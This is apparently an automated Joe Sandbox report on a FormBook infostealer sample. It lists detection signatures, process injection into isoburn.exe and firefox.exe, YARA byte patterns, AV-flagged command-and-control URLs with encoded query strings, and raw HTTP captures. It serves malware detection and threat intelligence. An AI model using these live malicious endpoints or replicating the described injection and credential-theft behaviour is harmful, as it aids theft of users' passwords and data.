Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_CCTEB77.exe

Overview

General Information

Sample Name:PO_CCTEB77.exe
Analysis ID:1352162
MD5:7391f0c0a4cd63ecedef46dbb072542c
SHA1:d48186b338445f25fc92c9aede867010be3c3b8f
SHA256:5f409d66b5e4403f5c05ff19c88acd96d0ee3a0511c4ebca73abe01ced6eb5b6
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PO_CCTEB77.exe (PID: 5628 cmdline: C:\Users\user\Desktop\PO_CCTEB77.exe MD5: 7391F0C0A4CD63ECEDEF46DBB072542C)
    • PO_CCTEB77.exe (PID: 3008 cmdline: C:\Users\user\Desktop\PO_CCTEB77.exe MD5: 7391F0C0A4CD63ECEDEF46DBB072542C)
      • AQhPMwWbqUlSTgiqGOPNvqG.exe (PID: 5784 cmdline: "C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\isoburn.exe MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • AQhPMwWbqUlSTgiqGOPNvqG.exe (PID: 1600 cmdline: "C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4676 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.PO_CCTEB77.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.PO_CCTEB77.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2aef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.PO_CCTEB77.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.PO_CCTEB77.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2a0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: PO_CCTEB77.exeReversingLabs: Detection: 70%
            Source: PO_CCTEB77.exeVirustotal: Detection: 66%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Antivirus detection for URL or domain
            Source: http://www.domainappraisalbot.com/ahec/?KHcH=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JEVJR030KrPkQ==&Vjk=-N-tntXAvira URL Cloud: Label: malware
            Source: http://www.jones4deepriver.com/ahec/?KHcH=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBsblhtcQm5YDg==&Vjk=-N-tntXAvira URL Cloud: Label: malware
            Source: http://www.nesmalt.info/ahec/?Vjk=-N-tntX&KHcH=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRude7iecelPQFgCQ==Avira URL Cloud: Label: malware
            Source: http://www.fam-scharf.net/ahec/?Vjk=-N-tntX&KHcH=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUxaOpL3PpxqeQ==Avira URL Cloud: Label: malware
            Source: http://www.77moea.top/ahec/?Vjk=-N-tntX&KHcH=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy86ItGv6ERTYYg==Avira URL Cloud: Label: phishing
            Source: http://www.poria.link/ahec/Avira URL Cloud: Label: malware
            Source: http://www.nesmalt.info/ahec/Avira URL Cloud: Label: malware
            Source: http://www.fam-scharf.net/ahec/Avira URL Cloud: Label: malware
            Source: http://www.77moea.top/ahec/Avira URL Cloud: Label: phishing
            Source: http://www.makeinai.online/ahec/?KHcH=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0uXSPTvTu0ZjA==&Vjk=-N-tntXAvira URL Cloud: Label: malware
            Source: http://www.altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntXAvira URL Cloud: Label: malware
            Source: http://www.makeinai.online/ahec/Avira URL Cloud: Label: malware
            Source: http://www.thecoloringbitch.com/ahec/Avira URL Cloud: Label: malware
            Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpAvira URL Cloud: Label: malware
            Source: http://www.domainappraisalbot.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.thecoloringbitch.com/ahec/?Vjk=-N-tntX&KHcH=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA76IWuP2FlzTnw==Avira URL Cloud: Label: malware
            Source: http://www.jones4deepriver.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.poria.link/ahec/?Vjk=-N-tntX&KHcH=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VjrVHIYZDWS5A==Avira URL Cloud: Label: malware
            Source: http://www.instantconvey.com/ahec/?Vjk=-N-tntX&KHcH=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClw6x6iQ2E33Xw==Avira URL Cloud: Label: malware
            Source: http://www.altralogos.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.instantconvey.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.alldaysslimmingstea.com/ahec/?Vjk=-N-tntX&KHcH=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVPoMkTtjkNnJA==Avira URL Cloud: Label: malware
            Source: http://www.611erhm.top/ahec/Avira URL Cloud: Label: phishing
            Source: http://www.611erhm.top/ahec/?KHcH=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJLbH8mycsz0Gg==&Vjk=-N-tntXAvira URL Cloud: Label: phishing
            Source: http://altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4ZAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: www.611erhm.topVirustotal: Detection: 12%Perma Link
            Source: fam-scharf.netVirustotal: Detection: 8%Perma Link
            Source: instantconvey.comVirustotal: Detection: 5%Perma Link
            Source: altralogos.comVirustotal: Detection: 16%Perma Link
            Source: wrautomotive.onlineVirustotal: Detection: 7%Perma Link
            Source: thecoloringbitch.comVirustotal: Detection: 13%Perma Link
            Source: alldaysslimmingstea.comVirustotal: Detection: 13%Perma Link
            Source: www.77moea.topVirustotal: Detection: 10%Perma Link
            Source: www.thecoloringbitch.comVirustotal: Detection: 7%Perma Link
            Source: www.altralogos.comVirustotal: Detection: 12%Perma Link
            Source: http://www.thecoloringbitch.com/ahec/Virustotal: Detection: 7%Perma Link
            Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpVirustotal: Detection: 13%Perma Link
            Machine Learning detection for sample
            Source: PO_CCTEB77.exeJoe Sandbox ML: detected
            Source: PO_CCTEB77.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO_CCTEB77.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2077705276.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4474211062.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_CCTEB77.exe, PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdbSHA256 source: PO_CCTEB77.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdb source: PO_CCTEB77.exe
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0301C280 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C280
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then pop edi5_2_03011A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax5_2_030099C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then pop edi5_2_0300E2BF
            Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:47:34 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 21:16:32 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 02 Dec 2023 17:47:45 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 02 Dec 2023 17:47:47 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 02 Dec 2023 17:47:50 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Sat, 02 Dec 2023 17:47:53 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 